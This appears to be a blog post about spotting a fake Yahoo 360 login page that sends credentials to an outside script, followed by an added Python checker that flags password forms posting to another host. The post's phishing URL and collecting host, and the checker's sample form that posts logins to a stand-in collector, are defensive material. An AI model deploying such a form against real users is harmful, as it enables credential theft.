I just got an IM from a buddy. He told me to go to www(dot)geocities(dot)com(slash)picc_81(slash)index.htm
This appeared to be a Yahoo 360 login page. "Odd," I thought, "Why do I need to log in to see a Geocities page? And anyway, aren't I already logged in to Yahoo?"
Let's view the source. Oh. It sends the login credentials to a script on www2.fiberbit.net -- looks like it emails them to firstname.lastname@example.org
Nice job, phish boy.
I've reported it to PIRT, the Gmail guys, and the Google Safe Browsing folks.
Now to contact my buddy and give him the bad news.
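The view-source check described above can be automated. The following is an added example, not code from the original post: it flags any form that contains a password field and submits to a host other than the one serving the page. The hosts, script path and HTML are constructed stand-ins, since the post does not show the page's actual source.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: hosts, paths and markup are placeholders, not the real page.
PAGE_URL = "http://free-hosting.example/picc_81/index.htm"
SAMPLE_HTML = """
<form method="post" action="http://collector.example/cgi-bin/PLACEHOLDER.cgi">
  <input type="text" name="login"> <input type="password" name="passwd">
</form>
<form action="/search"><input type="text" name="q"></form>
<form action="login.php"><input type="PASSWORD" name="p"></form>
"""

class FormAudit(HTMLParser):
    """Record each form's action and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []    # one dict per form: {"action": str, "password": bool}
        self._open = None  # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._open)
        elif (tag == "input" and self._open is not None
              and (a.get("type") or "").lower() == "password"):
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def offsite_credential_forms(page_url, html):
    """Return (page_host, target_host, target_url) for password forms posting off-host."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    audit = FormAudit()
    audit.feed(html)
    findings = []
    for form in audit.forms:
        # An empty or relative action resolves against the page URL itself.
        target = urljoin(page_url, form["action"])
        target_host = (urlsplit(target).hostname or "").lower()
        if form["password"] and target_host != page_host:
            findings.append((page_host, target_host, target))
    return findings

if __name__ == "__main__":
    for page_host, target_host, target in offsite_credential_forms(PAGE_URL, SAMPLE_HTML):
        print(f"password form on {page_host} submits to {target_host}: {target}")
```

A hit is a triage signal rather than proof, because legitimate sites also post logins to a separate authentication host; the mismatch matters when the target has no relationship to the brand shown on the page.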